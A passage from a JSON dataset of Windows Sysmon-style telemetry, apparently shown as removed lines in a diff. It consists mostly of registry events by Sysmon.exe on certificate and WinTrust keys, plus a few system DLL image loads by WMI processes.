"Performance Refreshed", - "timestamp": 131883573482290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sysmain.dll", - "image_path": "C:\\Windows\\System32\\sysmain.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480259984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wmiprov.dll", - "image_path": "C:\\Windows\\System32\\wbem\\wmiprov.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "image_load", - "image_name": "rasctrs.dll", - "image_path": "C:\\Windows\\System32\\rasctrs.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480259984, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "esscli.dll", - "image_path": "C:\\Windows\\System32\\wbem\\esscli.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wmiclnt.dll", - "image_path": "C:\\Windows\\System32\\wmiclnt.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573482450016, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 